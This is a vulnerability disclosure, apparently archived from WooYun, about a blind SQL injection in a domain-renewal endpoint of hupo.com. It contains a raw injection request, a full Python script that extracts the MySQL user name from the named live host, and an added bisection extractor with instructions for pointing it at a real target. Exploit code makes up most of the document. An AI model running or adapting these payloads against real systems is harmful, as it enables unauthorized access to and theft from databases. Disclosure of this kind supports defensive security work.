WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online reader -------------------- http://drop.zone.ci/
Disclosure timeline:
2015-08-14: Details reported to the vendor, awaiting vendor response
2015-08-18: Vendor confirmed; details visible to the vendor only
2015-08-28: Details disclosed to core white hats and relevant domain experts
2015-09-07: Details disclosed to regular white hats
2015-09-17: Details disclosed to intern white hats
2015-10-02: Details disclosed to the public
POST /DO_RenewDomain.php HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hupo.com:80/
Cookie: PHPSESSID=f9brj2crqtot1s23iiihmgrau3
Host: www.hupo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

submit=&AvailDomains=1&btnAdd=%e6%b7%bb%e5%8a%a0%20>>&btnRemove=<<%20%e7%a7%bb%e9%99%a4&cmd=SelectDomain&domains=-1' OR length(user())=15 or 'x'=' &DomainsList=1&realCmd=RenewDomain&step=3
The `domains` parameter is a boolean-based blind SQL injection point. When the injected condition is true (the user() string is 15 characters long), the page responds one way:
When it is false, it responds differently:
So I wrote a script to run through it:
Script attached:
# encoding=utf-8
# Boolean-based blind SQL injection: recovers MySQL user() one character at a
# time through the vulnerable `domains` parameter of /DO_RenewDomain.php.
# Ported from the original Python 2 script (httplib -> http.client, print()).
import http.client
import sys

headers = {'Content-Type': 'application/x-www-form-urlencoded'}
# candidate characters tried at every position of user()
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')

print('Start to retrieve MySQL User:\n')
user = ''
for i in range(1, 16):  # user() was already found to be 15 characters long
    for payload in payloads:
        print('.', end='')
        conn = http.client.HTTPConnection('www.hupo.com', timeout=60)
        # condition is true only when the i-th character of user() equals the candidate
        s = "domains=-1' or ascii(mid(user()from(%s)for(1)))=%s or 'x'='" % (i, ord(payload))
        conn.request(method='POST', url='/DO_RenewDomain.php',
                     body='submit=&AvailDomains=1&btnAdd=%e6%b7%bb%e5%8a%a0%20>>&btnRemove=<<%20%e7%a7%bb%e9%99%a4&cmd=SelectDomain&DomainsList=1&realCmd=RenewDomain&step=3&' + s,
                     headers=headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        # the response to a true condition contains '2015-08-29'; the false response does not
        if html_doc.find('2015-08-29') > 0:
            user += payload
            sys.stdout.write('\r[In Progress]' + user)
            sys.stdout.flush()
            break
print('[Done]MySQL user is %s' % user)
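The script above spends up to 65 requests per character because it tries every candidate in turn. The same true/false oracle (rows returned or not, visible as a difference in the page) can be bisected instead: about 8 requests per character and a handful to find the length first, the way the report's `length(user())=15` probe does. The block below is an added example, not code from the report or from hupo.com: it runs against a constructed in-memory SQLite stand-in for the vulnerable page, extracts a hypothetical secret value in place of MySQL user(), and uses SQLite's `unicode(substr(...))` where the report's MySQL payload uses `ascii(mid(... from ... for 1))`.

```python
import sqlite3

# Constructed stand-in for the vulnerable endpoint: a page that splices the
# `domains` parameter into a query and renders different HTML depending on
# whether rows came back. SECRET plays the role of MySQL user().
SECRET = "demo@localhost"   # hypothetical value, not the real server's user()


class FakeVulnerableApp:
    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE domains(id INTEGER, name TEXT)")
        self.db.execute("INSERT INTO domains VALUES (1, 'example.com')")
        self.db.execute("CREATE TABLE users(id INTEGER, name TEXT)")
        self.db.execute("INSERT INTO users VALUES (1, ?)", (SECRET,))
        self.requests = 0   # counts "HTTP requests" made against the stand-in

    def request(self, domains):
        """Vulnerable query: user input concatenated straight into the SQL."""
        self.requests += 1
        sql = "SELECT name FROM domains WHERE id = '%s'" % domains
        try:
            rows = self.db.execute(sql).fetchall()
        except sqlite3.Error:
            rows = []
        return "<li>example.com</li>" if rows else "<p>no domains</p>"


# SQLite equivalent of the value the report extracts; in MySQL use user().
EXPR = "(SELECT name FROM users WHERE id = 1)"


def oracle(app, cond):
    """True iff the injected condition makes the query return rows.
    Same shape as the report's payload:  -1' OR <cond> OR 'x'='"""
    page = app.request("-1' OR %s OR 'x'='" % cond)
    return "<li>" in page


def find_length(app, expr, max_len=64):
    """Smallest n with length(expr) <= n, found by bisection.
    (The report's length(user())=15 probe answers one guess per request.)"""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(app, "length(%s) <= %d" % (expr, mid)):
            hi = mid
        else:
            lo = mid + 1
    return lo


def find_char(app, expr, pos, max_code=255):
    """Bisect the code point of the character at 1-based position `pos`.
    SQLite: unicode(substr(e, pos, 1));  MySQL: ascii(mid(e from pos for 1))."""
    lo, hi = 0, max_code
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(app, "unicode(substr(%s, %d, 1)) <= %d" % (expr, pos, mid)):
            hi = mid
        else:
            lo = mid + 1
    return chr(lo)


def extract(app, expr=EXPR):
    """Length first, then every character, each by bisection."""
    n = find_length(app, expr)
    return "".join(find_char(app, expr, i) for i in range(1, n + 1))


if __name__ == "__main__":
    app = FakeVulnerableApp()
    value = extract(app)
    print("extracted %r in %d requests" % (value, app.requests))
```

Against a real target the `oracle` function is the only part that changes: send the condition in the `domains` field of the POST body and test the response for the marker that distinguishes the true page (the report uses the string `2015-08-29`). Cap `max_code` at 127 when the value is known to be ASCII to save one request per character.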
I figure the rating will be average, so I'll leave it at that...
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-08-18 17:27
Vulnerability fixed
Vendor response: none yet